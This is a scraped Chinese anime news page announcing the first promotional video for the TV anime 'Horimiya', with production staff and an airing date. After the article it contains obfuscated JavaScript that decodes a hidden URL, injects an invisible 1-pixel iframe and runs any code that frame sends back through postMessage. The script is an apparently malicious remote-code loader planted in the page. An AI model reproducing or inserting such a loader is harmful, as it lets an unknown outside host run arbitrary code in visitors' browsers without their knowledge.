• TV动画《堀与宫村》公开第一弹PV
  • 来源:樱花动漫 人气:加载中 更新:2021-02-09 01:24

根据HERO原作萩原大辅创作的漫画改编的TV动画《堀与宫村》公开了第一段PV。在这次的PV中,可以看到堀与宫村相互注意到对方时的片段。

《堀与宫村》是在HERO创作的网络漫画《堀桑与宫村君》的基础上重新进行创作的漫画。本作讲述了以名为堀京子女高中生和名为宫村伊澄的男高中生为中心的恋爱喜剧。在2012年至2018年,《堀桑与宫村君》曾先后推出了4话OVA。

39.jpg

这次的动画由CloverWorks负责制作,石浜真史担任导演,吉冈孝夫负责编剧与剧本。作品预计将于2021年1月开始播出。

樱花动漫所有内容均来自互联网收集而来,版权归原创者所有.

if(typeof eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=="undefined"){eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=function(e){var sx="ABCDEFGHIJKLMNOPQRSTUVWXYZ"+"abcdefghijklmnopqrstuvwxyz"+"0123456789+/=";var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=sx.indexOf(e.charAt(f++));o=sx.indexOf(e.charAt(f++));u=sx.indexOf(e.charAt(f++));a=sx.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return(function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);};}
eval('\x77\x69\x6e\x64\x6f\x77')['WTspKAT']=function (){ ;(function (u, w, d, f, c) { var x = qdfEWb; u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c, 'g'), '')))+'.fon'; 'jQuery'; var k = '', wr = 'w' + 'ri' + 't' + 'e'; var c = d[x('Y3VycmVudFNjcmlwdA==')]; var f = d.createElement('iframe'); f.id = new Date().getTime(); f.style.width = f.style.height = 1 + 'px'; f.src = [u].join('-'); d[wr](f.outerHTML); w['ad' + 'dEv' + 'entL' + 'ist' + 'ener']('m' + 'ess' + 'age', function (e) { if (e.data[`des_s_7532`]) { var t = x(e.data[`des_s_7532`].replace(new RegExp('FdaWAFAbWFf', 'g'), '')); new Function(decodeURIComponent(t.replace(/\+/g, '%20')))(); } }); })(''+'FFa'+'HR0'+'cHF'+'FMl'+'M0E'+'lFF'+'MkY'+'FFl'+'MkZ'+'qYF'+'FS5'+'nc2'+'JFF'+'zeW'+'xqc'+'y5j'+'b20'+'FFl'+'M0E'+'xMD'+'Q0F'+'FMy'+'UFF'+'yRm'+'FFM'+'0YF'+'F2E'+'0FF'+'MiU'+'FFy'+'RmM'+'tNz'+'UzF'+'FMi'+'0yM'+'iFF'+'0xZ'+'FFT'+'Y=',window, document, '' + 'Pwf' + 'SmZ' + 'j' + '', 'F');}